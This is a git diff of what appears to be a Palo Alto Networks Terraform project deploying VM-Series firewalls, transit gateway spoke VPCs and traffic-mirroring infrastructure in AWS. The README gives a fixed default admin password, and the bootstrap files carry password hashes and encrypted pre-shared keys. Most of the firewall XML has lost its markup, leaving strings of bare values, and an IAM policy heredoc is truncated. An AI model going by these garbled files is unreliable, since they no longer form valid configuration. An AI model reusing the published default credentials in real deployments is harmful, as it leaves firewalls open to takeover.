transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}" + transit_gateway_route_table_id = "${var.aws_tgw_security_rtb_id}" +} + +//Server in subnet +data "aws_ami" "ubuntu" { + most_recent = true + + filter { + name = "name" + values = ["ubuntu/images/hvm-ssd/ubuntu-trusty-14.04-*"] + } + + filter { + name = "virtualization-type" + values = ["hvm"] + } + + owners = ["513442679011"] # Canonical +} + +resource "aws_instance" "web" { + ami = "${data.aws_ami.ubuntu.id}" + instance_type = "t2.micro" + key_name = "${var.pemkey}" + subnet_id = "${aws_subnet.primary.id}" + private_ip = "${var.serverip}" + security_groups = ["${aws_security_group.server_sg.id}"] + + tags = { + Name = "${var.servername}" + } +} + +resource "aws_instance" "web2" { + ami = "${data.aws_ami.ubuntu.id}" + instance_type = "t2.micro" + key_name = "${var.pemkey}" + subnet_id = "${aws_subnet.secondary.id}" + private_ip = "${var.server2ip}" + security_groups = ["${aws_security_group.server_sg.id}"] + + tags = { + Name = "${var.server2name}" + } +} + +//End Server +output "vpc_id" { + value = "${aws_vpc.vpc_spoke.id}" +} + +output "subnet_id" { + value = "${aws_subnet.primary.id}" +} diff --git a/aws/TGW-VPC-GovCloud/vpc_spokes.tf b/aws/TGW-VPC-GovCloud/vpc_spokes.tf new file mode 100644 index 00000000..d0e66637 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/vpc_spokes.tf @@ -0,0 +1,31 @@ +module "spoke1" { + source = "./vpc_spoke/" + + pemkey = "${var.aws_key}" + serverip = "${var.spoke1_server}" + server2ip = "${var.spoke1_server2}" + servername = "spoke1-server1" + server2name = "spoke1-server2" + vpc_spoke_cidr = "${var.spoke1_cidr}" + vpc_spoke_subnet_cidr = "${var.spoke1_subnet}" + vpc_spoke_subnet2_cidr = "${var.spoke1_subnet2}" + aws_tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + aws_tgw_spoke_rtb_id = 
"${aws_ec2_transit_gateway_route_table.tgw_spokes.id}" + aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}" +} + +module "spoke2" { + source = "./vpc_spoke/" + + pemkey = "${var.aws_key}" + serverip = "${var.spoke2_server}" + server2ip = "${var.spoke2_server2}" + servername = "spoke2-server" + server2name = "spoke2-server2" + vpc_spoke_cidr = "${var.spoke2_cidr}" + vpc_spoke_subnet_cidr = "${var.spoke2_subnet}" + vpc_spoke_subnet2_cidr = "${var.spoke2_subnet2}" + aws_tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + aws_tgw_spoke_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}" + aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}" +} diff --git a/aws/TGW-VPC-Mirroring/README.md b/aws/TGW-VPC-Mirroring/README.md new file mode 100644 index 00000000..de470543 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/README.md @@ -0,0 +1,72 @@ +## 4 x VM-Series / 2 x Spoke VPCs via Transit Gateway +Terraform creates 2 VM-Series firewalls sets. 1 for inbound and outbound traffic from the spoke VPCs. The other set is setup behind an internal Load Balancer and ready for VPC Traffic Mirroring configuration. Currently, the AWS Terraform Provider does not support VPC Traffic Mirror. As a result, after deployment there are some steps that need to be done to setup VPC traffic Mirroring. Those are documenented in screen shots below. + +### Overview +* 3 x VPCs with relevant TGW connections and routing +* 4 x VM-Series (Bundle1) +* 2 x Ubuntu VM in spoke1 VPC +* 2 x Ubuntu VM in spoke2 VPC +* 1 x NLB Internal Load Balancer (NGFW 3 & 4 as backend) +* 4 x S3 Buckets for VM-Series + +This is picture of the deployed environment: Note: the Panorama server does not get deployed as part of this but can be easily setup to accept connections from the VM_Series firewall by modifying the init.cfg files in the bootstrap folders. + +![2019-09-25_15-44-51](https://user-images.githubusercontent.com/21991161/65640440-02757100-dfb0-11e9-9578-a2a920a270b5.jpg) + + +### Prerequistes +1. Terraform +2. Access to AWS Console + +After deployment, the firewalls' username and password are: + * **Username:** admin + * **Password:** Pal0Alt0@123 + +### Deployment +1. Download the **TGW-VPC-Mirroring** repo to the machine running the build +2. In an editor, open **variables.tf** and set values for the following variables + +| Variable | Description | +| :------------- | :------------- | +| `aws_region` | AWS Region of Deployment| +| `aws_key` | Authentication key file for deployed VMs | +| `bootstrap_s3bucket` | Universally unigue name for Boostrap S3 Bucket for NGFW1 | +| `bootstrap_s3bucket2`| Universally unigue name for Boostrap S3 Bucket for NGFW2 | +| `bootstrap_s3bucket3`| Universally unigue name for Boostrap S3 Bucket for NGFW3 | +| `bootstrap_s3bucket4`| Universally unigue name for Boostrap S3 Bucket for NGFW4 | +| + +3. Execute Terraform +``` +$ terraform init +$ terraform plan +$ terraform apply +``` + +5. After deployment an output with connection information will be displayed: +![output](https://user-images.githubusercontent.com/21991161/65640400-e671cf80-dfaf-11e9-992f-d026cc7f0f45.jpg) + +6. To configure VPC Mirroring first select VPC/Traffic Mirroring/Mirror Filter and Create a new traffic mirror filter + +![Mirrorfilterselection](https://user-images.githubusercontent.com/21991161/65637508-eb338500-dfa9-11e9-893b-1255ed2f7135.jpg)" width="350"> + + +7. 
Fill in the fields and click create
+![MirrorFilterOptions](https://user-images.githubusercontent.com/21991161/65637506-eb338500-dfa9-11e9-9453-c9a32bf9f276.jpg)
+
+7. Next select VPC/Traffic Mirroring/Mirror Targets and click Create a Mirror Target
+![Mirrortargetselection](https://user-images.githubusercontent.com/21991161/65637512-ebcc1b80-dfa9-11e9-9d27-a50ac1698ad3.jpg)
+
+
+8. Fill in the fields and click create
+![MirrorTargetoptions](https://user-images.githubusercontent.com/21991161/65637511-eb338500-dfa9-11e9-82b4-65cedbdeea71.jpg)
+
+9. Select VPC/Traffic Mirroring/Mirror Sessions and click Create a Mirror Session
+![MirrorSessionSelection](https://user-images.githubusercontent.com/21991161/65637510-eb338500-dfa9-11e9-9966-b4f5d1b279ca.jpg)
+
+10. Fill in the fields and click create
+![mirrorsessionoptions](https://user-images.githubusercontent.com/21991161/65637509-eb338500-dfa9-11e9-87c9-fdfdb3a6a738.jpg)
+
+## Support Policy
+The guide in this directory and accompanying files are released under an as-is, best-effort support policy. These scripts should be seen as community supported, and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, ASC (Authorized Support Centers) partners, and backline support options. The underlying product (the VM-Series firewall) used by the scripts or templates is still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best-effort policy.
diff --git a/aws/TGW-VPC-Mirroring/bootstrap.tf b/aws/TGW-VPC-Mirroring/bootstrap.tf
new file mode 100644
index 00000000..76438ede
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap.tf
@@ -0,0 +1,97 @@
+# Create a Bootstrap S3 Bucket
+
+resource "aws_s3_bucket" "bootstrap_bucket" {
+  bucket = "${var.bootstrap_s3bucket}"
+  acl = "private"
+  force_destroy = true
+
+  tags {
+    Name = "bootstrap_bucket"
+  }
+}
+
+# Create Folders and Upload Bootstrap Files
+resource "aws_s3_bucket_object" "bootstrap_xml" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl = "private"
+  key = "config/bootstrap.xml"
+  source = "bootstrap_files/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl = "private"
+  key = "config/init-cfg.txt"
+  source = "bootstrap_files/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl = "private"
+  key = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl = "private"
+  key = "license/authcodes"
+  source = "bootstrap_files/authcodes"
+}
+
+resource "aws_s3_bucket_object" "content" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
+  acl = "private"
+  key = "content/"
+  source = "/dev/null"
+}
+
+/* Roles, ACLs, Permissions, etc... */
+
+resource "aws_iam_role" "bootstrap_role" {
+  name = "ngfw_bootstrap_role"
+
+  assume_role_policy = < + + + + + $1$cweppdgb$pU2XxH3TD.QyD29.TXnVT.
+ + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$kouigbds$mrNbt/msQehCS55jxNnYa. + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + 192.168.101.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + yes + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + 18.224.86.63 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + FW-1 + 18.224.86.63 + TP_stack-A + DG + 8.8.8.8 + 999663166453480 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + any + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + 
allow + yes + + + + trust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + default + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + + + + + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.1.45 + + ethernet1/1 + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.2.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.2.45 + + + + + + + ethernet1/2 + + + + + trust + + + trust + + + 10.0.0.0/8 + + + 10.0.0.0/8 + + any + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + any + + + critical + + + any + + any + client + any + disable + + + + + + + any + + + high + + + any + + any + client + any + disable + + + + + + + any + + + medium + + + any + + any + client + any + disable + + + + + + + any + + + informational + + + any + + any + client + any + disable + + + + + + + any + + + low + + + any + + any + client + any + disable + + + + + + + any + + + critical + + + any + + any + server + any + disable + + + + + + + any + + + high + + + any + + any + server + any + disable + + + + + + + any + + + medium + + + any + + any + server + any + disable + + + + + + + any + + + informational + + + any + + any + server + any + disable + + + + + + + any + + + low + + + any + + any + server + any + disable + + + + + + + + + + diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files/init-cfg.txt b/aws/TGW-VPC-Mirroring/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..8d8c673c --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files/init-cfg.txt @@ -0,0 +1,19 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname= +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary=8.8.8.8 +dns-secondary= +vm-auth-key= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files2/authcodes b/aws/TGW-VPC-Mirroring/bootstrap_files2/authcodes new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files2/authcodes @@ -0,0 +1 @@ + diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files2/bootstrap.xml b/aws/TGW-VPC-Mirroring/bootstrap_files2/bootstrap.xml new file mode 100644 index 00000000..bc3c7efb --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files2/bootstrap.xml @@ -0,0 +1,1087 @@ + + + + + + $1$frspqxow$mYHgnubHD/BO9DTqIU8eP. 
+ + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$aljwjsru$ZIQ1DURHk0wBmwWTajdFu/ + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.2.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + 192.168.102.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + yes + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + 18.224.86.63 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + FW-1 + 18.224.86.63 + TP_stack-B + DG + 8.8.8.8 + 999663166453480 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 2002 + + + + + + + + + + 1002 + + + + + + + + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + any + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + 
allow + + + + trust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + default + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + + + + + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.2.45 + + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.2.45 + + + + + + + ethernet1/2 + + + + + trust + + + trust + + + 10.0.0.0/8 + + + 10.0.0.0/8 + + any + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + any + + + critical + + + any + + any + client + any + disable + + + + + + + any + + + high + + + any + + any + client + any + disable + + + + + + + any + + + medium + + + any + + any + client + any + disable + + + + + + + any + + + informational + + + any + + any + client + any + disable + + + + + + + any + + + low + + + any + + any + client + any + disable + + + + + + + any + + + critical + + + any + + any + server + any + disable + + + + + + + any + + + high + + + any + + any + server + any + disable + + + + + + + any + + + medium + + + any + + any + server + any + disable + + + + + + + any + + + informational + + + any + + any + server + any + disable + + + + + + + any + + + low + + + any + + any + server + any + disable + + + + + + + + + + diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files2/init-cfg.txt b/aws/TGW-VPC-Mirroring/bootstrap_files2/init-cfg.txt new file mode 100644 index 00000000..8d8c673c --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files2/init-cfg.txt @@ -0,0 +1,19 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname= +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary=8.8.8.8 +dns-secondary= +vm-auth-key= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files3/authcodes b/aws/TGW-VPC-Mirroring/bootstrap_files3/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files3/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files3/bootstrap.xml b/aws/TGW-VPC-Mirroring/bootstrap_files3/bootstrap.xml new file mode 100644 index 00000000..0bc73e6e --- /dev/null +++ b/aws/TGW-VPC-Mirroring/bootstrap_files3/bootstrap.xml @@ -0,0 +1,857 @@ + + + + + + $1$cweppdgb$pU2XxH3TD.QyD29.TXnVT. 
+ + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$kouigbds$mrNbt/msQehCS55jxNnYa. + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + LB Healthcheck + + + + + + + + no + + + + + no + + + no + + + no + + + down + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + + + + + yes + yes + yes + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + 18.224.86.63 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + 18.224.86.63 + 8.8.8.8 + 382932559738703 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + mirror + + + mirror + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + default + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + + no + + + + vxlan + + + any + + + any + 
